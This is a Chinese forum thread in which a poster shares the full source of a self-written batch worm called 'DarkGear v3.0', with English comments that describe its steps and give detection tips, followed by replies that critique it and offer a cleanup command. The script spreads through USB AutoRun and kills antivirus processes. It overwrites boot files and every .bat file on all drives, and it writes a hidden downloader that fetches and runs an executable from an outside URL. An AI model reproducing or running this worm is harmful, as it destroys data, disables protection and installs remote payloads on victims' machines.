严重肯定一下,你写的bat很规范,变量也用得很好。
我也学BAT
给你看看我的吧,很久前写的,不要见笑啊,U盘传播,外加一个免杀的下载者(因为这个下载者放到了带“..”的特殊文件夹里,你应该明白呵呵)
AUTOEXEC --开机过程中就运行病毒了
带感染BAT文件,而且自身感染好像没有考虑= =||
@echo off
rem Entry point of the batch worm sample quoted in this thread; comments are analysis notes only.
rem Branches on the launch location: when the first two characters of the current directory
rem match any drive from D: to Z:, or the current directory is C:\RECYCL, control jumps to :auto.
rem Otherwise execution falls through to :ww, which installs a copy on C:.
rem Defender note: a .bat started from a RECYCL folder at a drive root is a strong hunting signal.
for %%i in (D: E: F: G: H: I: J: K: L: M: N: O: P: Q: R: S: T: U: V: W: X: Y: Z: )do (if %cd:~0,2%==%%i goto auto)
if %cd%==C:\RECYCL goto auto
:ww
rem Install step: clears the archive, system, read-only and hidden attributes on the running
rem script, then copies it over AutoRun.bat in the Common Files\Microsoft Shared directory.
rem Indicator for hunting: a file named AutoRun.bat in that directory.
attrib %0 -a -s -r -h
copy /y %0 "c:\Program Files\Common Files\Microsoft Shared\AutoRun.bat"
goto z
:z
rem Launcher check. When Auto.vbs is absent, :e creates and starts it and this instance exits.
rem When it is present, wscript is terminated and Auto.vbs is deleted; the file msconfig.ini
rem under MSSoap\Binaries then acts as a first-run marker: missing means :new, present means :zz.
rem Indicator: msconfig.ini in that MSSoap\Binaries directory.
IF NOT EXIST "c:\Program Files\Common Files\Microsoft Shared\Auto.vbs" goto e
tskill wscript
del "c:\Program Files\Common Files\Microsoft Shared\Auto.vbs"
if not exist "C:\Program Files\Common Files\MSSoap\Binaries\msconfig.ini" goto new
goto zz
:zz
rem Defence-evasion and tampering stage.
rem Step 1: tries to terminate a fixed list of processes by name with tskill. The names look
rem like antivirus and security-product processes - presumably; confirm against vendor lists.
rem Detection: a rapid series of tskill invocations from one script host or cmd.exe parent.
Tskill Mcshield
Tskill VsTskMgr
Tskill naPrdMgr
Tskill UpdaterUI
Tskill TBMon
Tskill scan32
Tskill Ravmond
Tskill CCenter
Tskill RavTask
Tskill Rav
Tskill Ravmon
Tskill RavmonD
Tskill RavStub
Tskill KVXP
Tskill KvMonXP
Tskill KVCenter
Tskill KVSrvXP
Tskill KRegEx
Tskill UIHost
Tskill TrojDie
Tskill FrogAgent
Tskill kav
Tskill kav32
Tskill kavstart
Tskill katmain
rem Step 2: unprotects c:\boot.ini, overwrites it with a single line, and re-protects it.
rem Destructive: the previous boot configuration is lost; recovery needs a known-good copy.
rem NOTE(review): the resulting boot behaviour cannot be determined from this file alone.
attrib -a -s -r -h c:\boot.ini
echo c:\="microsoft dos">c:\boot.ini
attrib +a +s +r +h c:\boot.ini
rem Step 3: replaces c:\msdos.sys with an [option] section and c:\config.sys with a lastdrive
rem line. Every loop iteration truncates config.sys, so only the last value written remains.
attrib -a -s -r -h c:\msdos.sys
attrib -a -s -r -h c:\config.sys
echo [option] >c:\msdos.sys
echo bootkey=1 >>c:\msdos.sys
echo BootMenu=0 >>c:\msdos.sys
echo BootWarn=0 >>c:\msdos.sys
echo BootFailSafe=0 >>c:\msdos.sys
echo DisabeLog =1 >>c:\msdos.sys
for %%k in (a,c,d,e,f,g,h,i,j,k,m,l,n,o,p,q,r,s,t,u,v,w,x,y,z) do @echo lastdrive=%%k >c:\config.sys
attrib +a +s +r +h c:\msdos.sys
attrib +a +s +r +h c:\config.sys
rem Step 4: rewrites c:\autoexec.bat. The REG lines below are written into that file by echo
rem with redirection; they are not executed at this point. The written commands would delete
rem several Run-key values (names resemble security products - presumably), set the Explorer
rem Hidden\SHOWALL CheckedValue to 0, set AtTaskMaxHours to 0 and delete the SafeBoot key.
rem Recovery note: if those commands ever ran, SafeBoot and SHOWALL must be restored from a
rem known-good registry export. Indicator: a hidden autoexec.bat containing REG DELETE lines.
attrib -a -s -r -h c:\autoexec.bat
echo @echo off >c:\autoexec.bat
echo REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v KvMonXP /f >>c:\autoexec.bat
echo REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v kav /f >>c:\autoexec.bat
echo REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v KAVPersonal50 /f >>c:\autoexec.bat
echo REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v McAfeeUpdaterUI /f >>c:\autoexec.bat
echo REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Network Associates Error Reporting /f >>c:\autoexec.bat
echo REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v YLive.exe /f >>c:\autoexec.bat
echo REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v yassistse /f >>c:\autoexec.bat
echo REG DELETE HKLM\ServiceSOFTWARE\Microsoft\Windows\CurrentVersion\Run /v ShStatEXE /f >>c:\autoexec.bat
echo REG DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL /v CheckedValue /f >>c:\autoexec.bat
echo REG add HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL /v CheckedValue /t REG_DWORD /d 0 /f >>c:\autoexec.bat
echo REG DELETE HKLM\SYSTEM\CurrentControlSet\Services\Schedule /v AtTaskMaxHours /f >>c:\autoexec.bat
echo reg add HKLM\SYSTEM\CurrentControlSet\Services\Schedule /v AtTaskMaxHours /t REG_DWORD /d 0 /f >>c:\autoexec.bat
echo REG DELETE HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot /f >>c:\autoexec.bat
attrib +a +s +r +h c:\autoexec.bat
rem Step 5: if the downloader script down.vbs is missing, :f writes it; otherwise go to :x.
IF NOT EXIST c:\Progra~1\Intern~1\PLUGINS\shell~1\down.vbs goto f
goto x
:x
rem Download-and-run stage. cscript runs down.vbs with a URL and a destination path, so a file
rem is fetched over HTTP and saved as DarkGear.exe; the following line launches a DarkGear.exe.
rem Network indicator: the host named in the URL on the cscript line.
rem File indicators: DarkGear.exe under either of the two directories shown here.
rem Persistence: AutoRun.vbs is copied into the All Users Startup folder (Chinese-localised
rem path), and AtTaskMaxHours under the Schedule service key is deleted and re-created as 0.
cscript c:\Progra~1\Intern~1\PLUGINS\shell~1\down.vbs http://www.llzaj.com/cmd.exe c:\Progra~1\Intern~1\PLUGINS\shell~1\DarkGear.exe
C:\Progra~1\COMMON~1\Micros~1\DarkGear.exe
copy /y "c:\Program Files\Common Files\Microsoft Shared\AutoRun.vbs" "C:\Documents and Settings\All Users\「开始」菜单\程序\启动\"
REG DELETE HKLM\SYSTEM\CurrentControlSet\Services\Schedule /v AtTaskMaxHours /f
reg add HKLM\SYSTEM\CurrentControlSet\Services\Schedule /v AtTaskMaxHours /t REG_DWORD /d 0 /f
goto a
:a
rem Main loop (never exits). Any missing helper file is recreated via :b, :d or :c first.
rem Then, for every drive from c: to p:, it drops AutoRun.inf at the root and creates a RECYCL
rem folder holding desktop.ini and AutoRun.bat, marks all of them archive, system, read-only
rem and hidden, pauses for roughly ten seconds using ping, and repeats.
rem Mitigation: keep AutoRun disabled for removable and fixed media.
rem Hunting: a hidden autorun.inf beside a hidden RECYCL folder on a drive root; a long-lived
rem cmd.exe that repeatedly spawns ping against 127.0.0.1.
IF NOT EXIST "c:\Program Files\Common Files\Microsoft Shared\AutoRun.vbs" goto b
if not exist "c:\Program Files\Common Files\Microsoft Shared\desktop.ini" goto d
IF NOT EXIST "c:\Program Files\Common Files\Microsoft Shared\AutoRun.inf" goto c
for %%i in (c: d: e: f: g: h: i: j: k: l: m: n: o: p: ) do copy /y "c:\Program Files\Common Files\Microsoft Shared\AutoRun.inf" %%i
for %%c in (c: d: e: f: g: h: i: j: k: l: m: n: o: p: ) do md "%%c\RECYCL"
for %%c in (c: d: e: f: g: h: i: j: k: l: m: n: o: p: ) do copy /y "c:\Program Files\Common Files\Microsoft Shared\desktop.ini" "%%c\RECYCL"
for %%c in (c: d: e: f: g: h: i: j: k: l: m: n: o: p: ) do copy /y "c:\Program Files\Common Files\Microsoft Shared\AutoRun.bat" "%%c\RECYCL"
for %%q in (c: d: e: f: g: h: i: j: k: l: m: n: o: p: ) do attrib "%%q\RECYCL\AutoRun.bat" +a +s +r +h
for %%q in (c: d: e: f: g: h: i: j: k: l: m: n: o: p: ) do attrib "%%q\RECYCL\desktop.ini" +a +s +r +h
for %%q in (c: d: e: f: g: h: i: j: k: l: m: n: o: p: ) do attrib "%%q\autorun.inf" +a +s +r +h
for %%q in (c: d: e: f: g: h: i: j: k: l: m: n: o: p: ) do attrib "%%q\RECYCL\" +a +s +r +h /s /d
ping 127.0.0.1 -n 10 >nul
goto a
:b
rem Appends a two-line WScript launcher to AutoRun.vbs. It runs AutoRun.bat through
rem WScript.Shell with window style 0, which is a hidden window, then returns to the loop.
rem Detection: wscript.exe starting a .bat with no visible console.
ECHO Set shell = Wscript.createobject("wscript.shell") >>"c:\Program Files\Common Files\Microsoft Shared\AutoRun.vbs"
ECHO a = shell.run ("C:\Progra~1\COMMON~1\Micros~1\AutoRun.bat",0)>>"c:\Program Files\Common Files\Microsoft Shared\AutoRun.vbs"
goto a
:c
rem Builds the AutoRun.inf template. Its OPEN entry and both shell verbs (open, explore) point
rem at RECYCL\AutoRun.bat, so opening the drive would start the script wherever AutoRun is
rem still honoured. Content signature for scanners: an [autorun] section naming RECYCL\AutoRun.bat.
ECHO [autorun]>>"c:\Program Files\Common Files\Microsoft Shared\AutoRun.inf"
ECHO OPEN=RECYCL\AutoRun.bat>>"c:\Program Files\Common Files\Microsoft Shared\AutoRun.inf"
ECHO shell\open\Command=RECYCL\AutoRun.bat>>"c:\Program Files\Common Files\Microsoft Shared\AutoRun.inf"
ECHO shell\explore\Command=RECYCL\AutoRun.bat>>"c:\Program Files\Common Files\Microsoft Shared\AutoRun.inf"
goto a
:d
rem Builds the desktop.ini template. The CLSID written here is the Recycle Bin shell folder,
rem so a folder carrying this file is displayed by Explorer as a Recycle Bin (disguise).
rem Hunting: a folder named RECYCL, rather than a genuine recycler directory, with this desktop.ini.
echo [.ShellClassInfo]>>"c:\Program Files\Common Files\Microsoft Shared\desktop.ini"
echo CLSID={645FF040-5081-101B-9F08-00AA002F954E}>>"c:\Program Files\Common Files\Microsoft Shared\desktop.ini"
goto a
:e
rem Relaunch step: writes Auto.vbs (the same hidden-window launcher for AutoRun.bat), starts
rem it through the .vbs file association, and ends this instance. The relaunched copy then
rem finds Auto.vbs present at :z and continues from there.
ECHO Set shell = Wscript.createobject("wscript.shell") >>"c:\Program Files\Common Files\Microsoft Shared\Auto.vbs"
ECHO a = shell.run ("C:\Progra~1\COMMON~1\Micros~1\AutoRun.bat",0)>>"c:\Program Files\Common Files\Microsoft Shared\Auto.vbs"
"c:\Program Files\Common Files\Microsoft Shared\Auto.vbs"
exit
:f
rem Writes the downloader script down.vbs into a directory literally named shell.. under the
rem PLUGINS folder. The poster states the dotted folder name is meant to avoid antivirus.
rem Generated script logic: argument 0 is the URL and argument 1 the destination path; a
rem synchronous GET is issued through Microsoft.XMLHTTP, the response body is written through
rem an ADODB.Stream in binary mode and saved with overwrite. On Error Resume Next hides failures.
rem Detection: a script host creating Microsoft.XMLHTTP together with ADODB.Stream and calling
rem SaveToFile is a classic downloader pattern; directory names ending in dots deserve a flag.
md c:\Progra~1\Intern~1\PLUGINS\shell..\
echo On Error Resume Next >c:\Progra~1\Intern~1\PLUGINS\shell..\down.vbs
echo Dim eee,eeee >>c:\Progra~1\Intern~1\PLUGINS\shell..\down.vbs
echo eeee = LCase(WScript.Arguments(1)) >>c:\Progra~1\Intern~1\PLUGINS\shell..\down.vbs
echo eee = LCase(WScript.Arguments(0)) >>c:\Progra~1\Intern~1\PLUGINS\shell..\down.vbs
echo Set xPost = createObject("Microsoft.XMLHTTP") >>c:\Progra~1\Intern~1\PLUGINS\shell..\down.vbs
echo xPost.Open "GET",eee,0 >>c:\Progra~1\Intern~1\PLUGINS\shell..\down.vbs
echo xPost.Send() >>c:\Progra~1\Intern~1\PLUGINS\shell..\down.vbs
echo Set sGet = createObject("ADODB.Stream") >>c:\Progra~1\Intern~1\PLUGINS\shell..\down.vbs
echo sGet.Mode = 3 >>c:\Progra~1\Intern~1\PLUGINS\shell..\down.vbs
echo sGet.Type = 1 >>c:\Progra~1\Intern~1\PLUGINS\shell..\down.vbs
echo sGet.Open() >>c:\Progra~1\Intern~1\PLUGINS\shell..\down.vbs
echo sGet.Write(xPost.responseBody) >>c:\Progra~1\Intern~1\PLUGINS\shell..\down.vbs
echo sGet.SaveToFile eeee,2 >>c:\Progra~1\Intern~1\PLUGINS\shell..\down.vbs
goto x
:auto
rem Reached when the script was started from a drive other than C: or from C:\RECYCL.
rem Opens an Explorer window on the current drive - presumably so the drive appears to open
rem normally for the user. Then installs through :ww when the copy on C: is missing, continues
rem at :z when Auto.vbs exists, and otherwise exits.
%windir%\explorer.exe %cd:~0,2%
if not exist "c:\Program Files\Common Files\Microsoft Shared\AutoRun.bat" goto ww
IF EXIST "c:\Program Files\Common Files\Microsoft Shared\Auto.vbs" goto z
exit
:new
rem First-run setup, taken when the msconfig.ini marker is absent.
rem 1. Copies AutoRun.bat into the dotted shell.. directory under PLUGINS.
rem 2. Registers eight at jobs: four that run tskill cmd and four that start the copied
rem    AutoRun.bat two minutes later. Hunting: list scheduled at jobs and look for these pairs.
rem 3. Writes the marker msconfig.ini; its DarkGear banner text is a usable content signature.
rem 4. Lists .bat files found on the enumerated drives into msconfig.inf in the Windows directory,
rem    clears their attributes and overwrites each one with AutoRun.bat.
rem    Destructive: original batch files are lost and must be restored from backup.
rem 5. Deletes the list from c:\windows and exits.
rem NOTE(review): the list is written under the windir variable but deleted from a fixed
rem c:\windows path, so a leftover msconfig.inf may survive as a forensic artefact - confirm.
md c:\Progra~1\Intern~1\PLUGINS\shell..\
copy "c:\Program Files\Common Files\Microsoft Shared\AutoRun.bat" c:\Progra~1\Intern~1\PLUGINS\shell..\
at 9:58 tskill cmd
at 10:00 c:\Progra~1\Intern~1\PLUGINS\shell~1\AutoRun.bat
at 13:58 tskill cmd
at 14:00 c:\Progra~1\Intern~1\PLUGINS\shell~1\AutoRun.bat
at 19:58 tskill cmd
at 20:00 c:\Progra~1\Intern~1\PLUGINS\shell~1\AutoRun.bat
at 15:58 tskill cmd
at 16:00 c:\Progra~1\Intern~1\PLUGINS\shell~1\AutoRun.bat
echo This is DarkGear v3.0 , Make by The Ghost Hunter >>"C:\Program Files\Common Files\MSSoap\Binaries\msconfig.ini"
FOR %%a in ( c: d: e: f: g: h: i: j: k: l: m: n: o: p: q: r: s: t: u: v: w: s: y: z: ) do dir /a:- /s /b %%a\*.bat>>%windir%\msconfig.inf
FOR /f "delims=" %%i in (%windir%\msconfig.inf) do attrib -a -s -r -h "%%i"
FOR /f "delims=" %%i in (%windir%\msconfig.inf) do copy /y "c:\Program Files\Common Files\Microsoft Shared\AutoRun.bat" "%%i"
del "c:\windows\msconfig.inf"
exit
其实那些TSkill都没用,编这个的时候我很菜
这个根本就没有用。只要懂得批处理就知道,你前面加了echo,是显示后面的内容,不会运行,关键的几句也没什么意思。至于echo去掉以后就懒得看了,反正你现在这个是没什么关系。
不行,写得不好!!!
想一下:
如果不是在系统所在盘(%SystemDrive%)下运行有什么后果??
是不是找不到目录!!导致重启后就不会在运行了所以应将第一句改一下
%HOMEPATH%改成%SystemDrive%%homepath%这样会更好
不过再强也只是个批处理而已;一句命令就能kill它
rem Cleanup one-liner from this reply: force-terminates every cmd.exe process, then deletes
rem power.bat from the All Users Startup folder (Chinese-localised path).
rem NOTE(review): this also ends legitimate cmd.exe sessions, possibly including the console it
rem is typed into, and removes only that one startup file; any other dropped files, scheduled
rem jobs or registry changes have to be checked separately.
taskkill /f /im cmd.exe &del "%SystemDrive%%HOMEPATH%\..\All Users\「开始」菜单\程序\启动\power.bat"
多运行两次一定搞定
还好啊..
运行后会删除自身..
系统后台会自动运行CMD..不断的运行..
然后进程里就会多很多CMD进程..
电脑一会后就会很卡..再过一会..依我看哪..就是死机了..
呵呵..还挺有意思的..
大惊小怪
小题大做